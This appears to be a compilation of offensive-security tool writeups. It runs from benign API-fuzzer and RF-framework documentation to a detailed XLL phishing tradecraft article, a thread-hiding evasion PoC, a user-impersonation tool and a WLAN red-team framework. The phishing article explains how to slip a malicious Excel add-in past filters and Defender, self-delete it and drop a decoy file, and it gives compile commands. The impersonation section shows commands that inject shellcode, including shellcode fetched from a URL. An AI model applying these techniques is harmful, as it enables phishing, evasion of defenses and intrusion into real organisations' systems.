There are often cases where some fields need to contain relevant business values in order for a request to succeed. You can provide such values using a reference data file specified by the --refData argument. The reference data file is a YAML-format file that contains specific fixed values for different paths in the request document. The file structure is as follows:

/path/0.1/auth:
prop#subprop: 12
prop2: 33
prop3#subprop1#subprop2: "test"
/path/0.1/cancel:
prop#test: 1

For each path you can supply custom values for properties and sub-properties which will have priority over values supplied by any other Fuzzer. Consider this request payload:

{
"address": {
"phone": "123",
"postCode": "408",
"street": "cool street"
},
"name": "Joe"
}

and the following reference data file file:

/path/0.1/auth:
address#street: "My Street"
name: "John"

This will result in any fuzzed request to the /path/0.1/auth endpoint being updated to contain the supplied fixed values:

{
"address": {
"phone": "123",
"postCode": "408",
"street": "My Street"
},
"name": "John"
}

The file uses Json path syntax for all the properties you can supply; you can separate elements through # as in the example above instead of ..

You can use environment (system) variables in a ref data file using: $$VARIABLE_NAME. (notice double $$)

Setting additionalProperties

As additional properties are maps i.e. they don't actually have a structure, CATS cannot currently generate valid values. If the elements within such a data structure are essential for a request, you can supply them via the refData file using the following syntax:

/path/0.1/auth:
address#street: "My Street"
name: "John"
additionalProperties:
topElement: metadata
mapValues:
test: "value1"
anotherTest: "value2"

The additionalProperties element must contain the actual key-value pairs to be sent within the requests and also a top element if needed. topElement is not mandatory. The above example will output the following json (considering also the above examples):

{
"address": {
"phone": "123",
"postCode": "408",
"street": "My Street"
},
"name": "John",
"metadata": {
"test": "value1",
"anotherTest": "value2"
}
}

RefData reserved keywords

The following keywords are reserved in a reference data file: additionalProperties, topElement and mapValues.

Sending ref data for ALL paths

You can also have the ability to send the same reference data for ALL paths (just like you do with the headers). You can achieve this by using all as a key in the refData file:

all:
address#zip: 123

This will try to replace address#zip in all requests (if the field is present).

Removing fields

There are (rare) cases when some fields may not make sense together. Something like: if you send firstName and lastName, you are not allowed to also send name. As OpenAPI does not have the capability to send request fields which are dependent on each other, you can use the refData file to instruct CATS to remove fields before sending a request to the service. You can achieve this by using the cats_remove_field as a value for the fields you want to remove. For the above case the refData field will look as follows:

all:
name: "cats_remove_field"

Creating a Ref Data file with the FunctionalFuzzer

You can leverage the fact that the FunctionalFuzzer can run functional flows in order to create dynamic --refData files which won't need manual setting the reference data values. The --refData file must be created with variables ${variable} instead of fixed values and those variables must be output variables in the functionalFuzzer.yml file. In order for the FunctionalFuzzer to properly replace the variables names with their values you must supply the --refData file as an argument when the FunctionalFuzzer runs.

> cats run functionalFuzzer.yml -c contract.yml -s http://localhost:8080 --refData=refData.yml

The functionalFuzzer.yml file:

/pet:
test_1:
description: Create a Pet
httpMethod: POST
name: "My Pet"
expectedResponseCode: 200
output:
petId: pet#id

The refData.yml file:

/pet-type:
id: ${petId}

After running CATS using the command and the 2 files above, you will get a refData_replace.yml file where the id will get the value returned into the petId variable.

The refData_replaced.yml:

/pet-type:
id: 123

You can now use the refData_replaced.yml as a --refData file for running CATS with the rest of the Fuzzers.

Headers File

This can be used to send custom fixed headers with each payload. It is useful when you have authentication tokens you want to use to authenticate the API calls. You can use path specific headers or common headers that will be added to each call using an all element. Specific paths will take precedence over the all element. Sample headers file:

all:
Accept: application/json
/path/0.1/auth:
jwt: XXXXXXXXXXXXX
/path/0.2/cancel:
jwt: YYYYYYYYYYYYY

This will add the Accept header to all calls and the jwt header to the specified paths. You can use environment (system) variables in a headers file using: $$VARIABLE_NAME. (notice double $$)

DELETE requests

DELETE is the only HTTP verb that is intended to remove resources and executing the same DELETE request twice will result in the second one to fail as the resource is no longer available. It will be pretty heavy to supply a large list of identifiers within the --refData file and this is why the recommendation was to skip the DELETE method when running CATS.

But starting with version 7.0.2 CATS has some intelligence in dealing with DELETE. In order to have enough valid entities CATS will save the corresponding POST requests in an internal Queue, and everytime a DELETE request it will be executed it will poll data from there. In order to have this actually working, your contract must comply with common sense conventions:

  • the DELETE path is actually the POST path plus an identifier: if POST is /pets, then DELETE is expected to be /pets/{petId}.
  • CATS will try to match the {petId} parameter within the body returned by the POST request while doing various combinations of the petId name. It will try to search for the following entries: petId, id, pet-id, pet_id with different cases.
  • If any of those entries is found within a stored POST result, it will replace the {petId} with that value

For example, suppose that a POST to /pets responds with:

{
"pet_id": 2,
"name": "Chuck"
}

When doing a DELETE request, CATS will discover that {petId} and pet_id are used as identifiers for the Pet resource, and will do the DELETE at /pets/2.

If these conventions are followed (which also align to good REST naming practices), it is expected that DELETE and POSTrequests will be on-par for most of the entities.

Content Negotiation

Some APIs might use content negotiation versioning which implies formats like application/v11+json in the Accept header.

You can handle this in CATS as follows:

  • if the OpenAPI contract defines its content as:
 requestBody:
required: true
content:
application/v5+json:
schema:
$ref: '#/components/RequestV5'
application/v6+json:
schema:
$ref: '#/components/RequestV6'

by having clear separation between versions, you can pass the --contentType argument with the version you want to test: cats ... --contentType="application/v6+json".

If the OpenAPI contract is not version aware (you already exported it specific to a version) and the content looks as:

 requestBody:
required: true
content:
application/json:
schema:
$ref: '#/components/RequestV5'

and you still need to pass the application/v5+json Accept header, you can use the --headers file to add it:

all:
Accept: "application/v5+json"

Edge Spaces Strategy

There isn't a consensus on how you should handle situations when you trail or prefix valid values with spaces. One strategy will be to have the service trimming spaces before doing the validation, while some other services will just validate them as they are. You can control how CATS should expect such cases to be handled by the service using the --edgeSpacesStrategy argument. You can set this to trimAndValidate or validateAndTrim depending on how you expect the service to behave:

  • trimAndValidate means that the service will first trim the spaces and after that run the validation
  • validateAndTrim means that the service runs the validation first without any trimming of spaces

This is a global setting i.e. configured when CATS starts and all Fuzzer expects a consistent behaviour from all the service endpoints.

URL Parameters

There are cases when certain parts of the request URL are parameterized. For example a case like: /{version}/pets. {version} is supposed to have the same value for all requests. This is why you can supply actual values to replace such parameters using the --urlParams argument. You can supply a ; separated list of name:value pairs to replace the name parameters with their corresponding value. For example supplying --urlParams=version:v1.0 will replace the version parameter from the above example with the value v1.0.

Dealing with AnyOf, AllOf and OneOf

CATS also supports schemas with oneOf, allOf and anyOf composition. CATS wil consider all possible combinations when creating the fuzzed payloads.

Dynamic values in configuration files

The following configuration files: securityFuzzerFile, functionalFuzzerFile, refData support setting dynamic values for the inner fields. For now the support only exists for java.time.* and org.apache.commons.lang3.*, but more types of elements will come in the near future.

Let's suppose you have a date/date-time field, and you want to set it to 10 days from now. You can do this by setting this as a value T(java.time.OffsetDateTime).now().plusDays(10). This will return an ISO compliant time in UTC format.

A functionalFuzzer using this can look like:

/path:
testNumber:
description: Short description of the test
prop: value
prop#subprop: "T(java.time.OffsetDateTime).now().plusDays(10)"
prop7:
- value1
- value2
- value3
oneOfSelection:
element#type: "Value"
expectedResponseCode: HTTP_CODE
httpMethod: HTTP_NETHOD

You can also check the responses using a similar syntax and also accounting for the actual values returned in the response. This is a syntax than can test if a returned date is after the current date: T(java.time.LocalDate).now().isBefore(T(java.time.LocalDate).parse(expiry.toString())). It will check if the expiry field returned in the json response, parsed as date, is after the current date.

The syntax of dynamically setting dates is compliant with the Spring Expression Language specs.

Running behind proxy

If you need to run CATS behind a proxy, you can supply the following arguments: --proxyHost and --proxyPort. A typical run with proxy settings on localhost:8080 will look as follows:

> cats --contract=YAML_FILE --server=SERVER_URL --proxyHost=localhost --proxyPort=8080

Dealing with Authentication

HTTP header(s) based authentication

CATS supports any form of HTTP header(s) based authentication (basic auth, oauth, custom JWT, apiKey, etc) using the headers mechanism. You can supply the specific HTTP header name and value and apply to all endpoints. Additionally, basic auth is also supported using the --basicauth=USR:PWD argument.

One-Way or Two-Way SSL

By default, CATS trusts all server certificates and doesn't perform hostname verification.

For two-way SSL you can specify a JKS file (Java Keystore) that holds the client's private key using the following arguments:

  • --sslKeystore Location of the JKS keystore holding certificates used when authenticating calls using one-way or two-way SSL
  • --sslKeystorePwd The password of the sslKeystore
  • --sslKeyPwd The password of the private key within the sslKeystore

For details on how to load the certificate and private key into a Java Keystore you can use this guide: https://mrkandreev.name/blog/java-two-way-ssl/.

Limitations

Native Binaries

When using the native binaries (not the uberjar) there might be issues when using dynamic values in the CATS files. This is due to the fact that GraalVM only bundles whatever can discover at compile time. The following classes are currently supported:

java.util.Base64.Encoder.class, java.util.Base64.Decoder.class, java.util.Base64.class, org.apache.commons.lang3.RandomUtils.class, org.apache.commons.lang3.RandomStringUtils.class, 
org.apache.commons.lang3.DateFormatUtils.class, org.apache.commons.lang3.DateUtils.class,
org.apache.commons.lang3.DurationUtils.class, java.time.LocalDate.class, java.time.LocalDateTime.class, java.time.OffsetDateTime.class

API specs

At this moment, CATS only works with OpenAPI specs and has limited functionality using template payloads through the cats fuzz ... subcommand.

Media types and HTTP methods

The Fuzzers has the following support for media types and HTTP methods:

  • application/json and application/x-www-form-urlencoded media types only
  • HTTP methods: POST, PUT, PATCH, GET and DELETE

Additional Parameters

If a response contains a free Map specified using the additionalParameters tag CATS will issue a WARN level log message as it won't be able to validate that the response matches the schema.

Regexes within 'pattern'

CATS uses RgxGen in order to generate Strings based on regexes. This has certain limitations mostly with complex patterns.

Custom Files General Info

All custom files that can be used by CATS (functionalFuzzerFile, headers, refData, etc) are in a YAML format. When setting or getting values to/from JSON for input and/or output variables, you must use a JsonPath syntax using either # or . as separators. You can find some selector examples here: JsonPath.

Contributing

Please refer to CONTRIBUTING.md.



FISSURE - Frequency Independent SDR-based Signal Understanding and Reverse Engineering


Frequency Independent SDR-based Signal Understanding and Reverse Engineering

FISSURE is an open-source RF and reverse engineering framework designed for all skill levels with hooks for signal detection and classification, protocol discovery, attack execution, IQ manipulation, vulnerability analysis, automation, and AI/ML. The framework was built to promote the rapid integration of software modules, radios, protocols, signal data, scripts, flow graphs, reference material, and third-party tools. FISSURE is a workflow enabler that keeps software in one location and allows teams to effortlessly get up to speed while sharing the same proven baseline configuration for specific Linux distributions.

The framework and tools included with FISSURE are designed to detect the presence of RF energy, understand the characteristics of a signal, collect and analyze samples, develop transmit and/or injection techniques, and craft custom payloads or messages. FISSURE contains a growing library of protocol and signal information to assist in identification, packet crafting, and fuzzing. Online archive capabilities exist to download signal files and build playlists to simulate traffic and test systems.

The friendly Python codebase and user interface allows beginners to quickly learn about popular tools and techniques involving RF and reverse engineering. Educators in cybersecurity and engineering can take advantage of the built-in material or utilize the framework to demonstrate their own real-world applications. Developers and researchers can use FISSURE for their daily tasks or to expose their cutting-edge solutions to a wider audience. As awareness and usage of FISSURE grows in the community, so will the extent of its capabilities and the breadth of the technology it encompasses.


Getting Started

Supported

There are two branches within FISSURE to make file navigation easier and reduce code redundancy. The Python2_maint-3.7 branch contains a codebase built around Python2, PyQt4, and GNU Radio 3.7; while the Python3_maint-3.8 branch is built around Python3, PyQt5, and GNU Radio 3.8.

Operating System FISSURE Branch
Ubuntu 18.04 (x64) Python2_maint-3.7
Ubuntu 18.04.5 (x64) Python2_maint-3.7
Ubuntu 18.04.6 (x64) Python2_maint-3.7
Ubuntu 20.04.1 (x64) Python3_maint-3.8
Ubuntu 20.04.4 (x64) Python3_maint-3.8

In-Progress (beta)

Operating System FISSURE Branch
Ubuntu 22.04 (x64) Python3_maint-3.8

Note: Certain software tools do not work for every OS. Refer to Software And Conflicts

Installation

git clone https://github.com/ainfosec/fissure.git
cd FISSURE
git checkout <Python2_maint-3.7> or <Python3_maint-3.8>
./install

This will automatically install PyQt software dependencies required to launch the installation GUIs if they are not found.

Next, select the option that best matches your operating system (should be detected automatically if your OS matches an option).


Python2_maint-3.7 Python3_maint-3.8

It is recommended to install FISSURE on a clean operating system to avoid existing conflicts. Select all the recommended checkboxes (Default button) to avoid errors while operating the various tools within FISSURE. There will be multiple prompts throughout the installation, mostly asking for elevated permissions and user names. If an item contains a "Verify" section at the end, the installer will run the command that follows and highlight the checkbox item green or red depending on if any errors are produced by the command. Checked items without a "Verify" section will remain black following the installation.


Usage

fissure

Refer to the FISSURE Help menu for more details on usage.

Details

Components

  • Dashboard
  • Central Hub (HIPRFISR)
  • Target Signal Identification (TSI)
  • Protocol Discovery (PD)
  • Flow Graph & Script Executor (FGE)


Capabilities

Signal Detector



IQ Manipulation


Signal Lookup


Pattern Recognition


Attacks


Fuzzing


Signal Playlists


Image Gallery


Packet Crafting


Scapy Integration


CRC Calculator


Logging


Lessons

FISSURE comes with several helpful guides to become familiar with different technologies and techniques. Many include steps for using various tools that are integrated into FISSURE.

  • Lesson1: OpenBTS
  • Lesson2: Lua Dissectors
  • Lesson3: Sound eXchange
  • Lesson4: ESP Boards
  • Lesson5: Radiosonde Tracking
  • Lesson6: RFID
  • Lesson7: Data Types
  • Lesson8: Custom GNU Radio Blocks
  • Lesson9: TPMS
  • Lesson10: Ham Radio Exams
  • Lesson11: Wi-Fi Tools

Roadmap

  • Add more hardware types, RF protocols, signal parameters, analysis tools
  • Support more operating systems
  • Create a signal conditioner, feature extractor, and signal classifier with selectable AI/ML techniques
  • Develop class material around FISSURE (RF Attacks, Wi-Fi, GNU Radio, PyQt, etc.)
  • Transition the main FISSURE components to a generic sensor node deployment scheme

Contributing

Suggestions for improving FISSURE are strongly encouraged. Leave a comment in the Discussions page if you have any thoughts regarding the following:

  • New feature suggestions and design changes
  • Software tools with installation steps
  • New lessons or additional material for existing lessons
  • RF protocols of interest
  • More hardware and SDR types for integration
  • IQ analysis scripts in Python
  • Installation corrections and improvements

Contributions to improve FISSURE are crucial to expediting its development. Any contributions you make are greatly appreciated. If you wish to contribute through code development, please fork the repo and create a pull request:

  1. Fork the project
  2. Create your feature branch (git checkout -b feature/AmazingFeature)
  3. Commit your changes (git commit -m 'Add some AmazingFeature')
  4. Push to the branch (git push origin feature/AmazingFeature)
  5. Open a pull request

Creating Issues to bring attention to bugs is also welcomed.

Collaborating

Contact Assured Information Security, Inc. (AIS) Business Development to propose and formalize any FISSURE collaboration opportunities–whether that is through dedicating time towards integrating your software, having the talented people at AIS develop solutions for your technical challenges, or integrating FISSURE into other platforms/applications.

License

GPL-3.0

For license details, see LICENSE file.

Contact

Follow on Twitter: @FissureRF, @AinfoSec

Chris Poore - Assured Information Security, Inc. - poorec@ainfosec.com

Business Development - Assured Information Security, Inc. - bd@ainfosec.com

Acknowledgments

Special thanks to Dr. Samuel Mantravadi and Joseph Reith for their contributions to this project.



DeathSleep - A PoC Implementation For An Evasion Technique To Terminate The Current Thread And Restore It Before Resuming Execution, While Implementing Page Protection Changes During No Execution


A PoC implementation for an evasion technique to terminate the current thread and restore it before resuming execution, while implementing page protection changes during no execution.


Intro

Sleep and obfuscation methods are well known in the maldev community, with different implementations, they have the objective of hiding from memory scanners while sleeping, usually changing page protections and even adding cool features like encrypting the shellcode, but there is another important point to hide our shellcode, and is hiding the current execution thread. Spoofing the stack is cool, but after thinking a little about it I thought that there is no need to spoof the stack… if there is no stack :)

The usability of this technique is left to the reader to assess, but in any case, I think it is a cool way to review some topics, and learn some maldev for those who, like me, are starting in this world.

The main implementation showed here holds everything that we need to take out of the stack in the data section, as global variables, but an impletementation moving everything to the heap will be published soon. It aims to show some key modifications that needs to be done to make this code pic and injectable.

This repository is mirrored between GitHub and GitLab.



XLL_Phishing - XLL Phishing Tradecraft


With Microsoft's recent announcement regarding the blocking of macros in documents originating from the internet (email AND web download), attackers have began aggressively exploring other options to achieve user driven access (UDA). There are several considerations to be weighed and balanced when looking for a viable phishing for access method:

  1. Complexity - The more steps that are required on the user's part, the less likely we are to be successful.
  2. Specificity - Are most victim machines susceptible to your attack? Is your attack architecture specific? Does certain software need to be installed?
  3. Delivery - Are there network/policy mitigations in place on the target network that limit how you could deliver your maldoc?
  4. Defenses - Is application whitelisting enforced?
  5. Detection - What kind of AV/EDR is the client running?

These are the major questions, however there are certainly more. Things get more complex as you realize that these factors compound each other; for example, if a client has a web proxy that prohibits the download of executables or DLL's, you may need to stick your payload inside a container (ZIP, ISO, etc). Doing so can present further issues down the road when it comes to detection. More robust defenses require more complex combinations of techniques to defeat.

This article will be written with a fictional target organization in mind; this organization has employed several defensive measures including email filtering rules, blacklisting certain file types from being downloaded, application whitelisting on endpoints, and Microsoft Defender for Endpoint as an EDR solution.

Real organizations may employ none of these, some, or even more defenses which can simplify or complicate the techniques outlined in this research. As always, know your target.


What are XLL's?

XLL's are DLL's, specifically crafted for Microsoft Excel. To the untrained eye they look a lot like normal excel documents.


XLL's provide a very attractive option for UDA given that they are executed by Microsoft Excel, a very commonly encountered software in client networks; as an additional bonus, because they are executed by Excel, our payload will almost assuredly bypass Application Whitelisting rules because a trusted application (Excel) is executing it. XLL's can be written in C, C++, or C# which provides a great deal more flexibility and power (and sanity) than VBA macros which further makes them a desirable choice.

The downside of course is that there are very few legitimate uses for XLL's, so it SHOULD be a very easy box to check for organizations to block the download of that file extension through both email and web download. Sadly many organizations are years behind the curve and as such XLL's stand to be a viable method of phishing for some time.

There are a series of different events that can be used to execute code within an XLL, the most notable of which is xlAutoOpen. The full list may be seen here:


Upon double clicking an XLL, the user is greeted by this screen:


This single dialog box is all that stands between the user and code execution; with fairly thin social engineering, code execution is all but assured.

Something that must be kept in mind is that XLL's, being executables, are architecture specific. This means that you must know your target; the version of Microsoft Office/Excel that the target organization utilizes will (usually) dictate what architecture you need to build your payload for.

There is a pretty clean break in Office versions that can be used as a rule of thumb:

Office 2016 or earlier: x86

Office 2019 or later: x64

It should be noted that it is possible to install the other architecture for each product, however these are the default architectures installed and in most cases this should be a reliable way to make a decision about which architecture to roll your XLL for. Of course depending on the delivery method and pretexting used as part of the phishing campaign, it is possible to provide both versions and rely on the victim to select the appropriate version for their system.

Resources

The XLL payload that was built during this research was based on this project by edparcell. His repository has good instructions on getting started with XLL's in Visual Studio, and I used his code as a starting point to develop a malicious XLL file.

A notable deviation from his repository is that should you wish to create your own XLL project, you will need to download the latest Excel SDK and then follow the instructions on the previously linked repo using this version as opposed to the 2010 version of the SDK mentioned in the README.

Delivery

Delivery of the payload is a serious consideration in context of UDA. There are two primary methods we will focus on:

  1. Email Attachment
  2. Web Delivery

Email Attachment

Either via attaching a file or including a link to a website where a file may be downloaded, email is a critical part of the UDA process. Over the years many organizations (and email providers) have matured and enforced rules to protect users and organizations from malicious attachments. Mileage will vary, but organizations now have the capability to:

  1. Block executable attachments (EXE, DLL, XLL, MZ headers overall)
  2. Block containers like ISO/IMG which are mountable and may contain executable content
  3. Examine zip files and block those containing executable content
  4. Block zip files that are password protected
  5. More

Fuzzing an organization's email rules can be an important part of an engagement, however care must always be taken so as to not tip one's hand that a Red Team operation is ongoing and that information is actively being gathered.

For the purposes of this article, it will be assumed that the target organization has robust email attachment rules that prevent the delivery of an XLL payload. We will pivot and look at web delivery.

Web Delivery

Email will still be used in this attack vector, however rather than sending an attachment it will be used to send a link to a website. Web proxy rules and network mitigations controlling allowed file download types can differ from those enforced in regards to email attachments. For the purposes of this article, it is assumed that the organization prevents the download of executable files (MZ headers) from the web. This being the case, it is worth exploring packers/containers.

The premise is that we might be able to stick our executable inside another file type and smuggle it past the organization's policies. A major consideration here is native support for the file type; 7Z files for example cannot be opened by Windows without installing third party software, so they are not a great choice. Formats like ZIP, ISO, and IMG are attractive choices because they are supported natively by Windows, and as an added bonus they add very few extra steps for the victim.

The organization unfortunately blocks ISO's and IMG's from being downloaded from the web; additionally, because they employ Data Loss Prevention (DLP) users are unable to mount external storage devices, which ISO's and IMG's are considered.

Luckily for us, even though the organization prevents the download of MZ-headered files, it does allow the download of zip files containing executables. These zip files are actively scanned for malware, to include prompting the user for the password for password-protected zip files; however because the executable is zipped it is not blocked by the otherwise blanket deny for MZ files.

Zip files and execution

Zip files were chosen as a container for our XLL payload because:

  1. They are natively compatible with Windows
  2. They are allowed to be downloaded from the internet by the organization
  3. They add very little additional complexity to the attack

Conveniently, double clicking a ZIP file on Windows will open that zip file in File Explorer:

 

Less conveniently, double clicking the XLL file from the zipped location triggers Windows Defender; even using the stock project from edparcell that doesn't contain any kind of malicious code.

 

Looking at the Windows Defender alert we see it is just a generic "Wacatac" alert:


However there is something odd; the file it identified as malicious was in c:\users\user\Appdata\Local\Temp\Temp1_ZippedXLL.zip, not C:\users\user\Downloads\ZippedXLL\ where we double clicked it. Looking at the Excel instance in ProcessExplorer shows that Excel is actually running the XLL from appdata\local\temp, not from the ZIP file that it came in:

 

This appears to be a wrinkle associated with ZIP files, not XLL's. Opening a TXT file from within a zip using notepad also results in the TXT file being copied to appdata\local\temp and opened from there. While opening a text file from this location is fine, Defender seems to identify any sort of actual code execution in this location as malicious.

If a user were to extract the XLL from the ZIP file and then run it, it will execute without any issue; however there is no way to guarantee that a user does this, and we really can't roll the dice on popping AV/EDR should they not extract it. Besides, double clicking the ZIP and then double clicking the XLL is far simpler and a victim is far more prone to complete those simple actions than go to the trouble of extracting the ZIP.

This problem caused me to begin considering a different payload type than XLL; I began exploring VSTO's, which are Visual Studio Templates for Office. I highly encourage you to check out that article.

VSTO's ultimately call a DLL which can either be located locally with the .XLSX that initiates everything, or hosted remotely and downloaded by the .XLSX via http/https. The local option provides no real advantages (and in fact several disadvantages in that there are several more files associated with a VSTO attack), and the remote option unfortunately requires a code signing certificate or for the remote location to be a trusted network. Not having a valid code signing cert, VSTO's do not mitigate any of the issues in this scenario that our XLL payload is running into.

We really seem to be backed into a corner here. Running the XLL itself is fine, however the XLL cannot be delivered by itself to the victim either via email attachment or web download due to organization policy. The XLL needs to be packaged inside a container, however due to DLP formats like ISO, IMG, and VHD are not viable. The victim needs to be able to open the container natively without any third party software, which really leaves ZIP as the option; however as discussed, running the XLL from a zipped folder results in it being copied and ran from appdata\local\temp which flags AV.

I spent many hours brain storming and testing things, going down the VSTO rabbit hole, exploring all conceivable options until I finally decided to try something so dumb it just might work.

This time I created a folder, placed the XLL inside it, and then zipped the folder:

 

Clicking into the folder reveals the XLL file:


Double clicking the XLL shows the Add-In prompt from Excel. Note that the XLL is still copied to appdata\local\temp, however there is an additional layer due to the extra folder that we created:

 

Clicking enable executes our code without flagging Defender:


Nice! Code execution. Now what?

Tradecraft

The pretexting involved in getting a victim to download and execute the XLL will vary wildly based on the organization and delivery method; themes might include employee salary data, calculators for compensation based on skillset, information on a project, an attendee roster for an event, etc. Whatever the lure, our attack will be a lot more effective if we actually provide the victim with what they have been promised. Without follow through, victims may become suspicious and report the document to their security teams which can quickly give the attacker away and curtail access to the target system.

The XLL by itself will just leave a blank Excel window after our code is done executing; it would be much better for us to provide the Excel Spreadsheet that the victim is looking for.

We can embed our XLSX as a byte array inside the XLL; when the XLL executes, it will drop the XLSX to disk beside the XLL after which it will be opened. We will name the XLSX the same as the XLL, the only difference being the extension.

Given that our XLL is written in C, we can bring in some of the capabilities from a previous writeup I did on Payload Capabilities in C, namely Self-Deletion. Combining these two techniques results in the XLL being deleted from disk, and the XLSX of the same name being dropped in it's place. To the undiscerning eye, it will appear that the XLSX was there the entire time.

Unfortunately the location where the XLL is deleted and the XLSX dropped is the appdata\temp\local folder, not the original ZIP; to address this we can create a second ZIP containing the XLSX alone and also read it into a byte array within the XLL. On execution in addition to the aforementioned actions, the XLL could try and locate the original ZIP file in c:\users\victim\Downloads\ and delete it before dropping the second ZIP containing just the XLSX in it's place. This could of course fail if the user saved the original ZIP in a different location or under a different name, however in many/most cases it should drop in the user's downloads folder automatically.


This screenshot shows in the lower pane the temp folder created in appdata\local\temp containing the XLL and the dropped XLSX, while the top pane shows the original File Explorer window from which the XLL was opened. Notice in the lower pane that the XLL has size 0. This is because it deleted itself during execution, however until the top pane is closed the XLL file will not completely disappear from the appdata\local\temp location. Even if the victim were to click the XLL again, it is now inert and does not really exist.

Similarly, as soon as the victim backs out of the opened ZIP in File Explorer (either by closing it or navigating to a different folder), should they click spreadsheet.zip again they will now find that the test folder contains importantdoc.xlsx; so the XLL has been removed and replaced by the harmless XLSX in both locations that it existed on disk.

This GIF demonstrates the download and execution of the XLL on an MDE trial VM. Note that for some reason Excel opens two instances here; on my home computer it only opened one, so not quite sure why that differs.


Detection

As always, we will ask "What does MDE see?"

A quick screenshot dump to prove that I did execute this on target and catch a beacon back on TestMachine11:



 

First off, zero alerts:


What does the timeline/event log capture?


Yikes. Truth be told I have no idea where the keylogging, encrypting, and decrypting credentials alerts are coming from as my code doesn't do any of that. Our actions sure look suspicious when laid out like this, but I will again comment on just how much data is collected by MDE on a single endpoint, let alone hundreds, thousands, or hundreds of thousands that an organization may have hooked into the EDR. So long as we aren't throwing any actual alerts, we are probably ok.

Code Sample

The moment most have probably been waiting for, I am providing a code sample of my developed XLL runner, limited to just those parts discussed here in the Tradecraft section. It will be on the reader to actually get the code into an XLL and implement it in conjunction with the rest of their runner. As always, do no harm, have permission to phish an organization, etc.

Compiling and setup

I have included the source code for a program that will ingest a file and produce hex which can be copied into the byte arrays defined in the snippet. Use this on the the XLSX you wish to present to the user, as well as the ZIP file containing the folder which contains that same XLSX and store them in their respective byte arrays. Compile this code using:

gcc -o ingestfile ingestfile.c

I had some issues getting my XLL's to compile using MingW on a kali machine so thought I would post the commands here:

x64

x86_64-w64-mingw32-gcc snippet.c 2013_Office_System_Developer_Resources/Excel2013XLLSDK/LIB/x64/XLCALL32.LIB -o importantdoc.xll -s -Os -DUNICODE -shared -I 2013_Office_System_Developer_Resources/Excel2013XLLSDK/INCLUDE/

x86

i686-w64-mingw32-gcc snippet.c 2013_Office_System_Developer_Resources/Excel2013XLLSDK/LIB/XLCALL32.LIB -o HelloWorldXll.xll -s -DUNICODE -Os -shared -I 2013_Office_System_Developer_Resources/Excel2013XLLSDK/INCLUDE/ 

After you compile you will want to make a new folder and copy the XLL into that folder. Then zip it using:

zip -r <myzipname>.zip <foldername>/

Note that in order for the tradecraft outlined in this post to work, you are going to need to match some variables in the code snippet to what you name the XLL and the zip file.

Conclusion

With the dominance of Office Macro's coming to a close, XLL's present an attractive option for phishing campaigns. With some creativity they can be used in conjunction with other techniques to bypass many layers of defenses implemented by organizations and security teams. Thank you for reading and I hope you learned something useful!



SharpImpersonation - A User Impersonation Tool - Via Token Or Shellcode Injection


This was a learning by doing project from my side. Well known techniques are used to built just another impersonation tool with some improvements in comparison to other public tools. The code base was taken from:

A blog post for the intruduction can be found here:


List user processes

PS > PS C:\temp> SharpImpersonation.exe list


List only elevated processes

PS > PS C:\temp> SharpImpersonation.exe list elevated

Impersonate the first process of the target user to start a new binary

PS > PS C:\temp> SharpImpersonation.exe user:<user> binary:<binary-Path>


Inject base64 encoded shellcode into the first process of the target user

PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<base64shellcode>


Inject shellcode loaded from a webserver into the first process of the target user

PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<URL>


Impersonate the target user via ImpersonateLoggedOnuser for the current session

PS > PS C:\temp> SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser


SDomDiscover - A Easy-To-Use Python Tool To Perform DNS Recon



   _____ ____                  ____  _                               
/ ___// __ \____ ____ ___ / __ \(_)_____________ _ _____ _____
\__ \/ / / / __ \/ __ `__ \/ / / / / ___/ ___/ __ \ | / / _ \/ ___/
___/ / /_/ / /_/ / / / / / / /_/ / (__ ) /__/ /_/ / |/ / __/ /
/____/_____/\____/_/ /_/ /_/_____/_/____/\___/\____/|___/\___/_/

A easy-to-use python tool to perform dns recon with multiple options

Installation:

It can be installed in any OS with python3

Manual installation

git clone https://github.com/D3Ext/SDomDiscover
cd SDomDiscover
pip3 install -r requirements.txt

One-liner

git clone https://github.com/D3Ext/SDomDiscover && cd SDomDiscover && pip3 install -r requirements.txt && python3 SDomDiscover.py

Usage:

Common usages

To see the help panel and other parameters

python3 SDomDiscover.py -h

Main usage of the tool to dump the valid domains in the SSL certificate

python3 SDomDiscover.py -d example.com

Used to perform all the queries and recognizement

python3 SDomDiscover.py -d domain.com --all


Pinecone - A WLAN Red Team Framework


Pinecone is a WLAN networks auditing tool, suitable for red team usage. It is extensible via modules, and it is designed to be run in Debian-based operating systems. Pinecone is specially oriented to be used with a Raspberry Pi, as a portable wireless auditing box.

This tool is designed for educational and research purposes only. Only use it with explicit permission.


Installation

For running Pinecone, you need a Debian-based operating system (it has been tested on Raspbian, Raspberry Pi Desktop and Kali Linux). Pinecone has the following requirements:

  • Python 3.5+. Your distribution probably comes with Python3 already installed, if not it can be installed using apt-get install python3.
  • dnsmasq (tested with version 2.76). Can be installed using apt-get install dnsmasq.
  • hostapd-wpe (tested with version 2.6). Can be installed using apt-get install hostapd-wpe. If your distribution repository does not have a hostapd-wpe package, you can either try to install it using a Kali Linux repository pre-compiled package, or compile it from its source code.

After installing the necessary packages, you can install the Python packages requirements for Pinecone using pip3 install -r requirements.txt in the project root folder.

Usage

For starting Pinecone, execute python3 pinecone.py from within the project root folder:

root@kali:~/pinecone# python pinecone.py 
[i] Database file: ~/pinecone/db/database.sqlite
pinecone >

Pinecone is controlled via a Metasploit-like command-line interface. You can type help to get the list of available commands, or help 'command' to get more information about a specific command:

pinecone > help

Documented commands (type help <topic>):
========================================
alias help load pyscript set shortcuts use
edit history py quit shell unalias

Undocumented commands:
======================
back run stop

pinecone > help use
Usage: use module [-h]

Interact with the specified module.

positional arguments:
module module ID

optional arguments:
-h, --help show this help message and exit

Use the command use 'moduleID' to activate a Pinecone module. You can use Tab auto-completion to see the list of current loaded modules:

pinecone > use 
attack/deauth daemon/hostapd-wpe report/db2json scripts/infrastructure/ap
daemon/dnsmasq discovery/recon scripts/attack/wpa_handshake
pinecone > use discovery/recon
pcn module(discovery/recon) >

Every module has options, that can be seen typing help run or run --help when a module is activated. Most modules have default values for their options (check them before running):

pcn module(discovery/recon) > help run
usage: run [-h] [-i INTERFACE]

optional arguments:
-h, --help show this help message and exit
-i INTERFACE, --iface INTERFACE
monitor mode capable WLAN interface (default: wlan0)

When a module is activated, you can use the run [options...] command to start its functionality. The modules provide feedback of their execution state:

pcn script(attack/wpa_handshake) > run -s TEST_SSID
